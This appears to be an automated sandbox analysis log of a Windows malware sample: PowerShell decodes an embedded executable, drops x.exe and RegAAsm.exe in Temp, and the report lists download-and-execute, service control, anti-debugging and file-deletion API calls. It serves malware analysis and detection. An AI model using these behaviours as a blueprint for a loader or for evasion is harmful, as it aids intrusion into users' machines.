Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Section loaded: winnsi.dll	Jump to behavior

Source: C:\Windows\System32\notepad.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAAZIYCAJ

Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe

Code function: 4_2_0041D0CF LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,

4_2_0041D0CF

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_00007FFC3C0C0AC3 push ebx; retf	3_2_00007FFC3C0C0AC4
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_004570CF push ecx; ret	4_2_004570E2
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_00435226 push ecx; ret	4_2_00435239
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_00457A00 push eax; ret	4_2_00457A1E

Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe

Code function: 4_2_004062E2 ShellExecuteW,URLDownloadToFileW,

4_2_004062E2

Source: C:\Users\user\AppData\Local\Temp\x.exe	File created: C:\Users\user\AppData\Local\Temp\RegAAsm.exe			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\x.exe			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe

Code function: 4_2_0041AC43 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

4_2_0041AC43

Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe

4_2_0041D0CF

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 830000 memory reserve \| memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 1B540000 memory reserve \| memory write watch			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe

Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,

4_2_0041A941

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3220	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 785	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Window / User API: threadDelayed 1992	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Window / User API: threadDelayed 7998	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_4-47689

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7404	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2180	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 1948	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe TID: 7564	Thread sleep count: 1992 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe TID: 7564	Thread sleep time: -5976000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe TID: 7564	Thread sleep count: 7998 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe TID: 7564	Thread sleep time: -23994000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_004090DC __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,	4_2_004090DC
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_0040B6B5 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	4_2_0040B6B5
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_0041C7E5 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,	4_2_0041C7E5
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_0040B8BA FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	4_2_0040B8BA
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_0044E989 FindFirstFileExA,	4_2_0044E989
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_00408CDE __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,	4_2_00408CDE
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_00419CEE FindFirstFileW,FindNextFileW,FindNextFileW,	4_2_00419CEE
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_00407EDD __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,	4_2_00407EDD
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_00406F13 FindFirstFileW,FindNextFileW,	4_2_00406F13

Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe

Code function: 4_2_00407357 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

4_2_00407357

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: RegAAsm.exe, 00000004.00000003.1536498847.0000000000712000.00000004.00000020.00020000.00000000.sdmp, RegAAsm.exe, 00000004.00000002.3887556228.0000000000712000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: RegAAsm.exe, 00000004.00000002.3887419828.000000000068E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`
Source: x.exe, 00000003.00000002.1511855850.000000000090E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe

API call chain: ExitProcess graph end node

graph_4-48714

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe

Code function: 4_2_0043B88D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

4_2_0043B88D

Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe

4_2_0041D0CF

Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe

Code function: 4_2_004438F4 mov eax, dword ptr fs:[00000030h]

4_2_004438F4

Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe

Code function: 4_2_00411999 GetNativeSystemInfo,GetProcessHeap,HeapAlloc,SetLastError,SetLastError,

4_2_00411999

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_00435398 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_00435398
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_0043B88D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_0043B88D
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_00434D6E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00434D6E
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: 4_2_00434F01 SetUnhandledExceptionFilter,	4_2_00434F01

Source: C:\Users\user\AppData\Local\Temp\x.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe

Code function: 4_2_004197D9 mouse_event,

4_2_004197D9

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Users\user\AppData\Local\Temp\RegAAsm.exe "C:\Users\user\AppData\Local\Temp\RegAAsm.exe"			Jump to behavior

Source: RegAAsm.exe, 00000004.00000002.3887556228.0000000000703000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: RegAAsm.exe, 00000004.00000002.3887556228.0000000000703000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager4kF
Source: RegAAsm.exe, 00000004.00000002.3887556228.0000000000703000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager#kU
Source: RegAAsm.exe, 00000004.00000002.3887419828.000000000068E000.00000004.00000020.00020000.00000000.sdmp, RegAAsm.exe, 00000004.00000002.3887419828.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, RegAAsm.exe, 00000004.00000002.3887419828.00000000006CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|
Source: RegAAsm.exe, 00000004.00000002.3887556228.0000000000703000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerpk

Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe

Code function: 4_2_00435034 cpuid

4_2_00435034

Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: GetLocaleInfoA,	4_2_0040F26B
